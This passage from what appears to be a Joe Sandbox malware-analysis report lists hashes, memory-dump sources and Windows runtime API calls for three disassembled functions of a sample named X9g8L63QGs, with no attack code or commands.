                                                                                                                                                                                                                                                                    • Opcode ID: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
                                                                                                                                                                                                                                                                    • Instruction ID: 7c45b55aa0cb0e84c443c2c9298304df2dbb368ce1cad07da1b74f598a8a517a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B91151B2618F8082EB119B25F4042AA77E6FB88B94F694234DECC47758DF3CC9518740
                                                                                                                                                                                                                                                                    Function 00007FFB1B6FE858 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID: O&:FreeLibrary
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-2600264430
                                                                                                                                                                                                                                                                    • Opcode ID: ab81c06c73e038f4722bd0195b2ba4bb40281938670383ef5ef7ebc0e01118fd
                                                                                                                                                                                                                                                                    • Instruction ID: 5bc04a1baf0458a5e1b3a12a89338de00bbee45103ef65905701dd194b1a9f72
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab81c06c73e038f4722bd0195b2ba4bb40281938670383ef5ef7ebc0e01118fd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1601E1A1E0CE4381EB509B76FC501396762FF55BA0F54E03AE95E43A74DE2CE4498700
                                                                                                                                                                                                                                                                    Function 00007FFB1C25E4D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FFB1C25E720: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB1C25E74B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
                                                                                                                                                                                                                                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C25E50A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __except_validate_context_recordabortterminate
                                                                                                                                                                                                                                                                    • String ID: csm$f
                                                                                                                                                                                                                                                                    • API String ID: 339134311-629598281
                                                                                                                                                                                                                                                                    • Opcode ID: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
                                                                                                                                                                                                                                                                    • Instruction ID: 5f838630f4e77e077a07ce51e5f5522173d07c1e425f9d0336be9db28dfe2c4a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E037E1908F4642D6547B71E5481FD6A56AF16764F248074DA880674ADE3CDC908691
                                                                                                                                                                                                                                                                    Function 00007FFB1C255524 Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FFB1C2553A9,?,?,?,?,00007FFB1C25F63F,?,?,?,?,?), ref: 00007FFB1C255543
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FFB1C2553A9,?,?,?,?,00007FFB1C25F63F,?,?,?,?,?), ref: 00007FFB1C2555CC
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                    • Opcode ID: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
                                                                                                                                                                                                                                                                    • Instruction ID: 943ff53e6d2f4074526414d75faf9415207ae4db597075025092a3746861995c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE1100F0A19E9283EA14BB75E84C1FA2293AF457B0F244634DD6E467D9DE3CE841C690